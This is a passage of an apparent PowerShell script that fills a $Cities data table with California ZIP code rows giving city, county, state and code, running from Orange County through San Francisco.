92618","Orange","California","CA","6","92618") + $null = $Cities.Rows.Add("Zcta 92620","Orange","California","CA","6","92620") + $null = $Cities.Rows.Add("Capistrano beach","Orange","California","CA","6","92624") + $null = $Cities.Rows.Add("Corona del mar","Orange","California","CA","6","92625") + $null = $Cities.Rows.Add("Costa mesa","Orange","California","CA","6","92626") + $null = $Cities.Rows.Add("Costa mesa","Orange","California","CA","6","92627") + $null = $Cities.Rows.Add("Monarch bay","Orange","California","CA","6","92629") + $null = $Cities.Rows.Add("Lake forest","Orange","California","CA","6","92630") + $null = $Cities.Rows.Add("Huntington beach","Orange","California","CA","6","92646") + $null = $Cities.Rows.Add("Huntington beach","Orange","California","CA","6","92647") + $null = $Cities.Rows.Add("Huntington beach","Orange","California","CA","6","92648") + $null = $Cities.Rows.Add("Huntington beach","Orange","California","CA","6","92649") + $null = $Cities.Rows.Add("Laguna niguel","Orange","California","CA","6","92651") + $null = $Cities.Rows.Add("Laguna hills","Orange","California","CA","6","92653") + $null = $Cities.Rows.Add("Midway city","Orange","California","CA","6","92655") + $null = $Cities.Rows.Add("Aliso viejo","Orange","California","CA","6","92656") + $null = $Cities.Rows.Add("Newport beach","Orange","California","CA","6","92657") + $null = $Cities.Rows.Add("Newport beach","Orange","California","CA","6","92660") + $null = $Cities.Rows.Add("Newport beach","Orange","California","CA","6","92661") + $null = $Cities.Rows.Add("Newport beach","Orange","California","CA","6","92662") + $null = $Cities.Rows.Add("Newport beach","Orange","California","CA","6","92663") + $null = $Cities.Rows.Add("San clemente","Orange","California","CA","6","92672") + $null = $Cities.Rows.Add("San clemente","Orange","California","CA","6","92673") + $null = $Cities.Rows.Add("Mission viejo","Orange","California","CA","6","92675") + $null = $Cities.Rows.Add("Silverado","Orange","California","CA","6","92676") + $null = $Cities.Rows.Add("Laguna niguel","Orange","California","CA","6","92677") + $null = $Cities.Rows.Add("Coto de caza","Orange","California","CA","6","92679") + $null = $Cities.Rows.Add("Westminster","Orange","California","CA","6","92683") + $null = $Cities.Rows.Add("Rancho santa mar","Orange","California","CA","6","92688") + $null = $Cities.Rows.Add("Mission viejo","Orange","California","CA","6","92691") + $null = $Cities.Rows.Add("Mission viejo","Orange","California","CA","6","92692") + $null = $Cities.Rows.Add("Zcta 92694","Orange","California","CA","6","92694") + $null = $Cities.Rows.Add("Zcta 926hh","Orange","California","CA","6","926HH") + $null = $Cities.Rows.Add("Zcta 926xx","Orange","California","CA","6","926XX") + $null = $Cities.Rows.Add("Santa ana","Orange","California","CA","6","92701") + $null = $Cities.Rows.Add("Santa ana","Orange","California","CA","6","92703") + $null = $Cities.Rows.Add("Santa ana","Orange","California","CA","6","92704") + $null = $Cities.Rows.Add("Cowan heights","Orange","California","CA","6","92705") + $null = $Cities.Rows.Add("Santa ana","Orange","California","CA","6","92706") + $null = $Cities.Rows.Add("Santa ana height","Orange","California","CA","6","92707") + $null = $Cities.Rows.Add("Fountain valley","Orange","California","CA","6","92708") + $null = $Cities.Rows.Add("Zcta 92780","Orange","California","CA","6","92780") + $null = $Cities.Rows.Add("Zcta 92782","Orange","California","CA","6","92782") + $null = $Cities.Rows.Add("Zcta 927hh","Orange","California","CA","6","927HH") + $null = $Cities.Rows.Add("Anaheim","Orange","California","CA","6","92801") + $null = $Cities.Rows.Add("Anaheim","Orange","California","CA","6","92802") + $null = $Cities.Rows.Add("Anaheim","Orange","California","CA","6","92804") + $null = $Cities.Rows.Add("Anaheim","Orange","California","CA","6","92805") + $null = $Cities.Rows.Add("Anaheim","Orange","California","CA","6","92806") + $null = $Cities.Rows.Add("Anaheim","Orange","California","CA","6","92807") + $null = $Cities.Rows.Add("Anaheim","Orange","California","CA","6","92808") + $null = $Cities.Rows.Add("Anaheim","Orange","California","CA","6","92821") + $null = $Cities.Rows.Add("Anaheim","Orange","California","CA","6","92823") + $null = $Cities.Rows.Add("Zcta 92831","Orange","California","CA","6","92831") + $null = $Cities.Rows.Add("Zcta 92832","Orange","California","CA","6","92832") + $null = $Cities.Rows.Add("Zcta 92833","Orange","California","CA","6","92833") + $null = $Cities.Rows.Add("Zcta 92835","Orange","California","CA","6","92835") + $null = $Cities.Rows.Add("Zcta 92840","Orange","California","CA","6","92840") + $null = $Cities.Rows.Add("Zcta 92841","Orange","California","CA","6","92841") + $null = $Cities.Rows.Add("Zcta 92843","Orange","California","CA","6","92843") + $null = $Cities.Rows.Add("Zcta 92844","Orange","California","CA","6","92844") + $null = $Cities.Rows.Add("Zcta 92845","Orange","California","CA","6","92845") + $null = $Cities.Rows.Add("Zcta 92860","Riverside","California","CA","6","92860") + $null = $Cities.Rows.Add("Zcta 92861","Orange","California","CA","6","92861") + $null = $Cities.Rows.Add("Zcta 92865","Orange","California","CA","6","92865") + $null = $Cities.Rows.Add("Zcta 92866","Orange","California","CA","6","92866") + $null = $Cities.Rows.Add("Zcta 92867","Orange","California","CA","6","92867") + $null = $Cities.Rows.Add("Zcta 92868","Orange","California","CA","6","92868") + $null = $Cities.Rows.Add("Zcta 92869","Orange","California","CA","6","92869") + $null = $Cities.Rows.Add("Zcta 92870","Orange","California","CA","6","92870") + $null = $Cities.Rows.Add("Zcta 92879","Riverside","California","CA","6","92879") + $null = $Cities.Rows.Add("Zcta 92880","Riverside","California","CA","6","92880") + $null = $Cities.Rows.Add("Zcta 92881","Riverside","California","CA","6","92881") + $null = $Cities.Rows.Add("Zcta 92882","Riverside","California","CA","6","92882") + $null = $Cities.Rows.Add("Zcta 92883","Riverside","California","CA","6","92883") + $null = $Cities.Rows.Add("Zcta 92886","Orange","California","CA","6","92886") + $null = $Cities.Rows.Add("Zcta 92887","Orange","California","CA","6","92887") + $null = $Cities.Rows.Add("Zcta 928hh","Orange","California","CA","6","928HH") + $null = $Cities.Rows.Add("Zcta 928xx","Orange","California","CA","6","928XX") + $null = $Cities.Rows.Add("San buenaventura","Ventura","California","CA","6","93001") + $null = $Cities.Rows.Add("San buenaventura","Ventura","California","CA","6","93003") + $null = $Cities.Rows.Add("San buenaventura","Ventura","California","CA","6","93004") + $null = $Cities.Rows.Add("Camarillo","Ventura","California","CA","6","93010") + $null = $Cities.Rows.Add("Camarillo","Ventura","California","CA","6","93012") + $null = $Cities.Rows.Add("Carpinteria","Santa Barbara","California","CA","6","93013") + $null = $Cities.Rows.Add("Bardsdale","Ventura","California","CA","6","93015") + $null = $Cities.Rows.Add("Moorpark","Ventura","California","CA","6","93021") + $null = $Cities.Rows.Add("Oak view","Ventura","California","CA","6","93022") + $null = $Cities.Rows.Add("Ojai","Ventura","California","CA","6","93023") + $null = $Cities.Rows.Add("Oxnard","Ventura","California","CA","6","93030") + $null = $Cities.Rows.Add("Oxnard","Ventura","California","CA","6","93033") + $null = $Cities.Rows.Add("Oxnard","Ventura","California","CA","6","93035") + $null = $Cities.Rows.Add("Piru","Ventura","California","CA","6","93040") + $null = $Cities.Rows.Add("Port hueneme","Ventura","California","CA","6","93041") + $null = $Cities.Rows.Add("Santa paula","Ventura","California","CA","6","93060") + $null = $Cities.Rows.Add("Santa susana","Ventura","California","CA","6","93063") + $null = $Cities.Rows.Add("Simi valley","Ventura","California","CA","6","93065") + $null = $Cities.Rows.Add("Somis","Ventura","California","CA","6","93066") + $null = $Cities.Rows.Add("Summerland","Santa Barbara","California","CA","6","93067") + $null = $Cities.Rows.Add("Zcta 930hh","Santa Barbara","California","CA","6","930HH") + $null = $Cities.Rows.Add("Zcta 930xx","Ventura","California","CA","6","930XX") + $null = $Cities.Rows.Add("Santa barbara","Santa Barbara","California","CA","6","93101") + $null = $Cities.Rows.Add("Santa barbara","Santa Barbara","California","CA","6","93103") + $null = $Cities.Rows.Add("Santa barbara","Santa Barbara","California","CA","6","93105") + $null = $Cities.Rows.Add("Montecito","Santa Barbara","California","CA","6","93108") + $null = $Cities.Rows.Add("Santa barbara","Santa Barbara","California","CA","6","93109") + $null = $Cities.Rows.Add("Santa barbara","Santa Barbara","California","CA","6","93110") + $null = $Cities.Rows.Add("Santa barbara","Santa Barbara","California","CA","6","93111") + $null = $Cities.Rows.Add("Goleta","Santa Barbara","California","CA","6","93117") + $null = $Cities.Rows.Add("Zcta 931hh","Santa Barbara","California","CA","6","931HH") + $null = $Cities.Rows.Add("Zcta 931xx","Santa Barbara","California","CA","6","931XX") + $null = $Cities.Rows.Add("Alpaugh","Tulare","California","CA","6","93201") + $null = $Cities.Rows.Add("Armona","Kings","California","CA","6","93202") + $null = $Cities.Rows.Add("Arvin","Kern","California","CA","6","93203") + $null = $Cities.Rows.Add("Avenal","Kings","California","CA","6","93204") + $null = $Cities.Rows.Add("Bodfish","Kern","California","CA","6","93205") + $null = $Cities.Rows.Add("Buttonwillow","Kern","California","CA","6","93206") + $null = $Cities.Rows.Add("California hot s","Tulare","California","CA","6","93207") + $null = $Cities.Rows.Add("Camp nelson","Tulare","California","CA","6","93208") + $null = $Cities.Rows.Add("Coalinga","Fresno","California","CA","6","93210") + $null = $Cities.Rows.Add("Corcoran","Kings","California","CA","6","93212") + $null = $Cities.Rows.Add("Delano","Kern","California","CA","6","93215") + $null = $Cities.Rows.Add("Delano","Kern","California","CA","6","93216") + $null = $Cities.Rows.Add("Ducor","Tulare","California","CA","6","93218") + $null = $Cities.Rows.Add("Earlimart","Tulare","California","CA","6","93219") + $null = $Cities.Rows.Add("Exeter","Tulare","California","CA","6","93221") + $null = $Cities.Rows.Add("Frazier park","Kern","California","CA","6","93222") + $null = $Cities.Rows.Add("Farmersville","Tulare","California","CA","6","93223") + $null = $Cities.Rows.Add("Fellows","Kern","California","CA","6","93224") + $null = $Cities.Rows.Add("Frazier park","Kern","California","CA","6","93225") + $null = $Cities.Rows.Add("Glennville","Kern","California","CA","6","93226") + $null = $Cities.Rows.Add("Hanford","Kings","California","CA","6","93230") + $null = $Cities.Rows.Add("Huron","Fresno","California","CA","6","93234") + $null = $Cities.Rows.Add("Ivanhoe","Tulare","California","CA","6","93235") + $null = $Cities.Rows.Add("Kernville","Kern","California","CA","6","93238") + $null = $Cities.Rows.Add("Kettleman city","Kings","California","CA","6","93239") + $null = $Cities.Rows.Add("Mountain mesa","Kern","California","CA","6","93240") + $null = $Cities.Rows.Add("Lamont","Kern","California","CA","6","93241") + $null = $Cities.Rows.Add("Laton","Fresno","California","CA","6","93242") + $null = $Cities.Rows.Add("Gorman","Kern","California","CA","6","93243") + $null = $Cities.Rows.Add("Lemoncove","Tulare","California","CA","6","93244") + $null = $Cities.Rows.Add("Lemoore naval ai","Kings","California","CA","6","93245") + $null = $Cities.Rows.Add("Lindsay","Tulare","California","CA","6","93247") + $null = $Cities.Rows.Add("Lost hills","Kern","California","CA","6","93249") + $null = $Cities.Rows.Add("Mc farland","Kern","California","CA","6","93250") + $null = $Cities.Rows.Add("Mc kittrick","Kern","California","CA","6","93251") + $null = $Cities.Rows.Add("Maricopa","Kern","California","CA","6","93252") + $null = $Cities.Rows.Add("New cuyama","Santa Barbara","California","CA","6","93254") + $null = $Cities.Rows.Add("Onyx","Kern","California","CA","6","93255") + $null = $Cities.Rows.Add("Pixley","Tulare","California","CA","6","93256") + $null = $Cities.Rows.Add("Porterville","Tulare","California","CA","6","93257") + $null = $Cities.Rows.Add("Posey","Tulare","California","CA","6","93260") + $null = $Cities.Rows.Add("Richgrove","Tulare","California","CA","6","93261") + $null = $Cities.Rows.Add("Giant forest","Tulare","California","CA","6","93262") + $null = $Cities.Rows.Add("Shafter","Kern","California","CA","6","93263") + $null = $Cities.Rows.Add("Springville","Tulare","California","CA","6","93265") + $null = $Cities.Rows.Add("Stratford","Kings","California","CA","6","93266") + $null = $Cities.Rows.Add("Strathmore","Tulare","California","CA","6","93267") + $null = $Cities.Rows.Add("Taft","Kern","California","CA","6","93268") + $null = $Cities.Rows.Add("Terra bella","Tulare","California","CA","6","93270") + $null = $Cities.Rows.Add("Three rivers","Tulare","California","CA","6","93271") + $null = $Cities.Rows.Add("Tipton","Tulare","California","CA","6","93272") + $null = $Cities.Rows.Add("Tulare","Tulare","California","CA","6","93274") + $null = $Cities.Rows.Add("Tupman","Kern","California","CA","6","93276") + $null = $Cities.Rows.Add("Visalia","Tulare","California","CA","6","93277") + $null = $Cities.Rows.Add("Pond","Kern","California","CA","6","93280") + $null = $Cities.Rows.Add("Waukena","Tulare","California","CA","6","93282") + $null = $Cities.Rows.Add("Weldon","Kern","California","CA","6","93283") + $null = $Cities.Rows.Add("Wofford heights","Kern","California","CA","6","93285") + $null = $Cities.Rows.Add("Woodlake","Tulare","California","CA","6","93286") + $null = $Cities.Rows.Add("Woody","Kern","California","CA","6","93287") + $null = $Cities.Rows.Add("Visalia","Tulare","California","CA","6","93291") + $null = $Cities.Rows.Add("Visalia","Tulare","California","CA","6","93292") + $null = $Cities.Rows.Add("Zcta 932hh","Kern","California","CA","6","932HH") + $null = $Cities.Rows.Add("Zcta 932xx","Kings","California","CA","6","932XX") + $null = $Cities.Rows.Add("Bakersfield","Kern","California","CA","6","93301") + $null = $Cities.Rows.Add("Bakersfield","Kern","California","CA","6","93304") + $null = $Cities.Rows.Add("College heights","Kern","California","CA","6","93305") + $null = $Cities.Rows.Add("Bakersfield","Kern","California","CA","6","93306") + $null = $Cities.Rows.Add("Bakersfield","Kern","California","CA","6","93307") + $null = $Cities.Rows.Add("Bakersfield","Kern","California","CA","6","93308") + $null = $Cities.Rows.Add("Bakersfield","Kern","California","CA","6","93309") + $null = $Cities.Rows.Add("Bakersfield","Kern","California","CA","6","93311") + $null = $Cities.Rows.Add("Greenacres","Kern","California","CA","6","93312") + $null = $Cities.Rows.Add("Bakersfield","Kern","California","CA","6","93313") + $null = $Cities.Rows.Add("Zcta 933hh","Kern","California","CA","6","933HH") + $null = $Cities.Rows.Add("Zcta 933xx","Kern","California","CA","6","933XX") + $null = $Cities.Rows.Add("San luis obispo","San Luis Obispo","California","CA","6","93401") + $null = $Cities.Rows.Add("Los osos","San Luis Obispo","California","CA","6","93402") + $null = $Cities.Rows.Add("San luis obispo","San Luis Obispo","California","CA","6","93405") + $null = $Cities.Rows.Add("Halcyon","San Luis Obispo","California","CA","6","93420") + $null = $Cities.Rows.Add("Atascadero","San Luis Obispo","California","CA","6","93422") + $null = $Cities.Rows.Add("Avila beach","San Luis Obispo","California","CA","6","93424") + $null = $Cities.Rows.Add("Bradley","Monterey","California","CA","6","93426") + $null = $Cities.Rows.Add("Buellton","Santa Barbara","California","CA","6","93427") + $null = $Cities.Rows.Add("Cambria","San Luis Obispo","California","CA","6","93428") + $null = $Cities.Rows.Add("Casmalia","Santa Barbara","California","CA","6","93429") + $null = $Cities.Rows.Add("Cayucos","San Luis Obispo","California","CA","6","93430") + $null = $Cities.Rows.Add("Creston","San Luis Obispo","California","CA","6","93432") + $null = $Cities.Rows.Add("Grover beach","San Luis Obispo","California","CA","6","93433") + $null = $Cities.Rows.Add("Guadalupe","Santa Barbara","California","CA","6","93434") + $null = $Cities.Rows.Add("Harmony","San Luis Obispo","California","CA","6","93435") + $null = $Cities.Rows.Add("Lompoc","Santa Barbara","California","CA","6","93436") + $null = $Cities.Rows.Add("Lompoc","Santa Barbara","California","CA","6","93437") + $null = $Cities.Rows.Add("Los alamos","Santa Barbara","California","CA","6","93440") + $null = $Cities.Rows.Add("Los olivos","Santa Barbara","California","CA","6","93441") + $null = $Cities.Rows.Add("Morro bay","San Luis Obispo","California","CA","6","93442") + $null = $Cities.Rows.Add("Nipomo","San Luis Obispo","California","CA","6","93444") + $null = $Cities.Rows.Add("Oceano","San Luis Obispo","California","CA","6","93445") + $null = $Cities.Rows.Add("Adelaide","San Luis Obispo","California","CA","6","93446") + $null = $Cities.Rows.Add("Paso robles","San Luis Obispo","California","CA","6","93447") + $null = $Cities.Rows.Add("Shell beach","San Luis Obispo","California","CA","6","93449") + $null = $Cities.Rows.Add("San ardo","Monterey","California","CA","6","93450") + $null = $Cities.Rows.Add("Parkfield","San Luis Obispo","California","CA","6","93451") + $null = $Cities.Rows.Add("San simeon","San Luis Obispo","California","CA","6","93452") + $null = $Cities.Rows.Add("California valle","San Luis Obispo","California","CA","6","93453") + $null = $Cities.Rows.Add("Santa maria","Santa Barbara","California","CA","6","93454") + $null = $Cities.Rows.Add("Orcutt","Santa Barbara","California","CA","6","93455") + $null = $Cities.Rows.Add("Zcta 93458","Santa Barbara","California","CA","6","93458") + $null = $Cities.Rows.Add("Santa ynez","Santa Barbara","California","CA","6","93460") + $null = $Cities.Rows.Add("Shandon","San Luis Obispo","California","CA","6","93461") + $null = $Cities.Rows.Add("Ballard","Santa Barbara","California","CA","6","93463") + $null = $Cities.Rows.Add("Templeton","San Luis Obispo","California","CA","6","93465") + $null = $Cities.Rows.Add("Zcta 934hh","Monterey","California","CA","6","934HH") + $null = $Cities.Rows.Add("Zcta 934xx","Monterey","California","CA","6","934XX") + $null = $Cities.Rows.Add("Mojave","Kern","California","CA","6","93501") + $null = $Cities.Rows.Add("California city","Kern","California","CA","6","93505") + $null = $Cities.Rows.Add("Acton","Los Angeles","California","CA","6","93510") + $null = $Cities.Rows.Add("Benton","Mono","California","CA","6","93512") + $null = $Cities.Rows.Add("Big pine","Inyo","California","CA","6","93513") + $null = $Cities.Rows.Add("Toms place","Inyo","California","CA","6","93514") + $null = $Cities.Rows.Add("Boron","Kern","California","CA","6","93516") + $null = $Cities.Rows.Add("Bridgeport","Mono","California","CA","6","93517") + $null = $Cities.Rows.Add("Havilah","Kern","California","CA","6","93518") + $null = $Cities.Rows.Add("Darwin","Inyo","California","CA","6","93522") + $null = $Cities.Rows.Add("North edwards","Kern","California","CA","6","93523") + $null = $Cities.Rows.Add("Independence","Inyo","California","CA","6","93526") + $null = $Cities.Rows.Add("Pearsonville","Kern","California","CA","6","93527") + $null = $Cities.Rows.Add("Johannesburg","Kern","California","CA","6","93528") + $null = $Cities.Rows.Add("June lake","Mono","California","CA","6","93529") + $null = $Cities.Rows.Add("Keeler","Inyo","California","CA","6","93530") + $null = $Cities.Rows.Add("Keene","Kern","California","CA","6","93531") + $null = $Cities.Rows.Add("Elizabeth lake","Los Angeles","California","CA","6","93532") + $null = $Cities.Rows.Add("Lancaster","Los Angeles","California","CA","6","93534") + $null = $Cities.Rows.Add("Hi vista","Los Angeles","California","CA","6","93535") + $null = $Cities.Rows.Add("Quartz hill","Los Angeles","California","CA","6","93536") + $null = $Cities.Rows.Add("Lee vining","Mono","California","CA","6","93541") + $null = $Cities.Rows.Add("Juniper hills","Los Angeles","California","CA","6","93543") + $null = $Cities.Rows.Add("Crystalaire","Los Angeles","California","CA","6","93544") + $null = $Cities.Rows.Add("Lone pine","Inyo","California","CA","6","93545") + $null = $Cities.Rows.Add("Crowley lake","Mono","California","CA","6","93546") + $null = $Cities.Rows.Add("Cartago","Inyo","California","CA","6","93549") + $null = $Cities.Rows.Add("Lake los angeles","Los Angeles","California","CA","6","93550") + $null = $Cities.Rows.Add("Leona valley","Los Angeles","California","CA","6","93551") + $null = $Cities.Rows.Add("Palmdale","Los Angeles","California","CA","6","93552") + $null = $Cities.Rows.Add("Juniper hills","Los Angeles","California","CA","6","93553") + $null = $Cities.Rows.Add("Randsburg","Kern","California","CA","6","93554") + $null = $Cities.Rows.Add("China lake nwc","Kern","California","CA","6","93555") + $null = $Cities.Rows.Add("Willow springs","Kern","California","CA","6","93560") + $null = $Cities.Rows.Add("Bear valley spri","Kern","California","CA","6","93561") + $null = $Cities.Rows.Add("Argus","San Bernardino","California","CA","6","93562") + $null = $Cities.Rows.Add("Valyermo","Los Angeles","California","CA","6","93563") + $null = $Cities.Rows.Add("Lake los angeles","Los Angeles","California","CA","6","93591") + $null = $Cities.Rows.Add("Zcta 935hh","Los Angeles","California","CA","6","935HH") + $null = $Cities.Rows.Add("Zcta 935xx","Kern","California","CA","6","935XX") + $null = $Cities.Rows.Add("Ahwahnee","Madera","California","CA","6","93601") + $null = $Cities.Rows.Add("Auberry","Fresno","California","CA","6","93602") + $null = $Cities.Rows.Add("Badger","Tulare","California","CA","6","93603") + $null = $Cities.Rows.Add("Bass lake","Madera","California","CA","6","93604") + $null = $Cities.Rows.Add("Big creek","Fresno","California","CA","6","93605") + $null = $Cities.Rows.Add("Biola","Fresno","California","CA","6","93606") + $null = $Cities.Rows.Add("Cantua creek","Fresno","California","CA","6","93608") + $null = $Cities.Rows.Add("Caruthers","Fresno","California","CA","6","93609") + $null = $Cities.Rows.Add("Chowchilla","Madera","California","CA","6","93610") + $null = $Cities.Rows.Add("Clovis","Fresno","California","CA","6","93611") + $null = $Cities.Rows.Add("Clovis","Fresno","California","CA","6","93612") + $null = $Cities.Rows.Add("Coarsegold","Madera","California","CA","6","93614") + $null = $Cities.Rows.Add("Cutler","Tulare","California","CA","6","93615") + $null = $Cities.Rows.Add("Del rey","Fresno","California","CA","6","93616") + $null = $Cities.Rows.Add("Dinuba","Tulare","California","CA","6","93618") + $null = $Cities.Rows.Add("Dos palos","Merced","California","CA","6","93620") + $null = $Cities.Rows.Add("Dunlap","Fresno","California","CA","6","93621") + $null = $Cities.Rows.Add("Firebaugh","Fresno","California","CA","6","93622") + $null = $Cities.Rows.Add("Fish camp","Mariposa","California","CA","6","93623") + $null = $Cities.Rows.Add("Five points","Fresno","California","CA","6","93624") + $null = $Cities.Rows.Add("Fowler","Fresno","California","CA","6","93625") + $null = $Cities.Rows.Add("Friant","Fresno","California","CA","6","93626") + $null = $Cities.Rows.Add("Helm","Fresno","California","CA","6","93627") + $null = $Cities.Rows.Add("Hume","Fresno","California","CA","6","93628") + $null = $Cities.Rows.Add("Kerman","Fresno","California","CA","6","93630") + $null = $Cities.Rows.Add("Kingsburg","Fresno","California","CA","6","93631") + $null = $Cities.Rows.Add("Lakeshore","Fresno","California","CA","6","93634") + $null = $Cities.Rows.Add("Los banos","Merced","California","CA","6","93635") + $null = $Cities.Rows.Add("Madera","Madera","California","CA","6","93637") + $null = $Cities.Rows.Add("Madera","Madera","California","CA","6","93638") + $null = $Cities.Rows.Add("Mendota","Fresno","California","CA","6","93640") + $null = $Cities.Rows.Add("Miramonte","Fresno","California","CA","6","93641") + $null = $Cities.Rows.Add("North fork","Madera","California","CA","6","93643") + $null = $Cities.Rows.Add("Oakhurst","Madera","California","CA","6","93644") + $null = $Cities.Rows.Add("O neals","Madera","California","CA","6","93645") + $null = $Cities.Rows.Add("Orange cove","Fresno","California","CA","6","93646") + $null = $Cities.Rows.Add("Orosi","Tulare","California","CA","6","93647") + $null = $Cities.Rows.Add("Parlier","Fresno","California","CA","6","93648") + $null = $Cities.Rows.Add("Pinedale","Fresno","California","CA","6","93650") + $null = $Cities.Rows.Add("Prather","Fresno","California","CA","6","93651") + $null = $Cities.Rows.Add("Raisin","Fresno","California","CA","6","93652") + $null = $Cities.Rows.Add("Raymond","Madera","California","CA","6","93653") + $null = $Cities.Rows.Add("Reedley","Fresno","California","CA","6","93654") + $null = $Cities.Rows.Add("Riverdale","Fresno","California","CA","6","93656") + $null = $Cities.Rows.Add("Sanger","Fresno","California","CA","6","93657") + $null = $Cities.Rows.Add("San joaquin","Fresno","California","CA","6","93660") + $null = $Cities.Rows.Add("Selma","Fresno","California","CA","6","93662") + $null = $Cities.Rows.Add("Shaver lake","Fresno","California","CA","6","93664") + $null = $Cities.Rows.Add("South dos palos","Merced","California","CA","6","93665") + $null = $Cities.Rows.Add("Sultana","Tulare","California","CA","6","93666") + $null = $Cities.Rows.Add("Tollhouse","Fresno","California","CA","6","93667") + $null = $Cities.Rows.Add("Tranquillity","Fresno","California","CA","6","93668") + $null = $Cities.Rows.Add("Wishon","Madera","California","CA","6","93669") + $null = $Cities.Rows.Add("Traver","Tulare","California","CA","6","93673") + $null = $Cities.Rows.Add("Squaw valley","Fresno","California","CA","6","93675") + $null = $Cities.Rows.Add("Zcta 936hh","Fresno","California","CA","6","936HH") + $null = $Cities.Rows.Add("Zcta 936xx","Merced","California","CA","6","936XX") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93701") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93702") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93703") + $null = $Cities.Rows.Add("Fig garden villa","Fresno","California","CA","6","93704") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93705") + $null = $Cities.Rows.Add("Easton","Fresno","California","CA","6","93706") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93710") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93711") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93720") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93721") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93722") + $null = $Cities.Rows.Add("Calwa","Fresno","California","CA","6","93725") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93726") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93727") + $null = $Cities.Rows.Add("Fresno","Fresno","California","CA","6","93728") + $null = $Cities.Rows.Add("Salinas","Monterey","California","CA","6","93901") + $null = $Cities.Rows.Add("Salinas","Monterey","California","CA","6","93905") + $null = $Cities.Rows.Add("Salinas","Monterey","California","CA","6","93906") + $null = $Cities.Rows.Add("Prunedale","Monterey","California","CA","6","93907") + $null = $Cities.Rows.Add("Salinas","Monterey","California","CA","6","93908") + $null = $Cities.Rows.Add("Big sur","Monterey","California","CA","6","93920") + $null = $Cities.Rows.Add("Carmel","Monterey","California","CA","6","93921") + $null = $Cities.Rows.Add("Carmel","Monterey","California","CA","6","93923") + $null = $Cities.Rows.Add("Carmel valley","Monterey","California","CA","6","93924") + $null = $Cities.Rows.Add("Chualar","Monterey","California","CA","6","93925") + $null = $Cities.Rows.Add("Gonzales","Monterey","California","CA","6","93926") + $null = $Cities.Rows.Add("Greenfield","Monterey","California","CA","6","93927") + $null = $Cities.Rows.Add("Jolon","Monterey","California","CA","6","93928") + $null = $Cities.Rows.Add("King city","Monterey","California","CA","6","93930") + $null = $Cities.Rows.Add("Lockwood","Monterey","California","CA","6","93932") + $null = $Cities.Rows.Add("Marina","Monterey","California","CA","6","93933") + $null = $Cities.Rows.Add("Del rey oaks","Monterey","California","CA","6","93940") + $null = $Cities.Rows.Add("Pacific grove","Monterey","California","CA","6","93950") + $null = $Cities.Rows.Add("Pebble beach","Monterey","California","CA","6","93953") + $null = $Cities.Rows.Add("San lucas","Monterey","California","CA","6","93954") + $null = $Cities.Rows.Add("Sand city","Monterey","California","CA","6","93955") + $null = $Cities.Rows.Add("Soledad","Monterey","California","CA","6","93960") + $null = $Cities.Rows.Add("Spreckels","Monterey","California","CA","6","93962") + $null = $Cities.Rows.Add("Zcta 939hh","Monterey","California","CA","6","939HH") + $null = $Cities.Rows.Add("Zcta 939xx","Monterey","California","CA","6","939XX") + $null = $Cities.Rows.Add("Belmont","San Mateo","California","CA","6","94002") + $null = $Cities.Rows.Add("Brisbane","San Mateo","California","CA","6","94005") + $null = $Cities.Rows.Add("Hillsborough","San Mateo","California","CA","6","94010") + $null = $Cities.Rows.Add("Colma","San Mateo","California","CA","6","94014") + $null = $Cities.Rows.Add("Daly city","San Mateo","California","CA","6","94015") + $null = $Cities.Rows.Add("Half moon bay","San Mateo","California","CA","6","94019") + $null = $Cities.Rows.Add("La honda","San Mateo","California","CA","6","94020") + $null = $Cities.Rows.Add("Loma mar","San Mateo","California","CA","6","94021") + $null = $Cities.Rows.Add("Los altos","Santa Clara","California","CA","6","94022") + $null = $Cities.Rows.Add("Los altos","Santa Clara","California","CA","6","94024") + $null = $Cities.Rows.Add("West menlo park","San Mateo","California","CA","6","94025") + $null = $Cities.Rows.Add("Atherton","San Mateo","California","CA","6","94027") + $null = $Cities.Rows.Add("Ladera","San Mateo","California","CA","6","94028") + $null = $Cities.Rows.Add("Millbrae","San Mateo","California","CA","6","94030") + $null = $Cities.Rows.Add("Montara","San Mateo","California","CA","6","94037") + $null = $Cities.Rows.Add("Moss beach","San Mateo","California","CA","6","94038") + $null = $Cities.Rows.Add("Mountain view","Santa Clara","California","CA","6","94040") + $null = $Cities.Rows.Add("Mountain view","Santa Clara","California","CA","6","94041") + $null = $Cities.Rows.Add("Mountain view","Santa Clara","California","CA","6","94043") + $null = $Cities.Rows.Add("Pacifica","San Mateo","California","CA","6","94044") + $null = $Cities.Rows.Add("Pescadero","San Mateo","California","CA","6","94060") + $null = $Cities.Rows.Add("Redwood city","San Mateo","California","CA","6","94061") + $null = $Cities.Rows.Add("Woodside","San Mateo","California","CA","6","94062") + $null = $Cities.Rows.Add("Redwood city","San Mateo","California","CA","6","94063") + $null = $Cities.Rows.Add("Redwood city","San Mateo","California","CA","6","94065") + $null = $Cities.Rows.Add("San bruno","San Mateo","California","CA","6","94066") + $null = $Cities.Rows.Add("San carlos","San Mateo","California","CA","6","94070") + $null = $Cities.Rows.Add("San gregorio","San Mateo","California","CA","6","94074") + $null = $Cities.Rows.Add("South san franci","San Mateo","California","CA","6","94080") + $null = $Cities.Rows.Add("Sunnyvale","Santa Clara","California","CA","6","94086") + $null = $Cities.Rows.Add("Sunnyvale","Santa Clara","California","CA","6","94087") + $null = $Cities.Rows.Add("Sunnyvale","Santa Clara","California","CA","6","94089") + $null = $Cities.Rows.Add("Zcta 940hh","San Mateo","California","CA","6","940HH") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94102") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94103") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94104") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94105") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94107") + $null = $Cities.Rows.Add("San francisco","San Francisco","California","CA","6","94108") + $null = $Cities.Rows.Add("San francisco","San 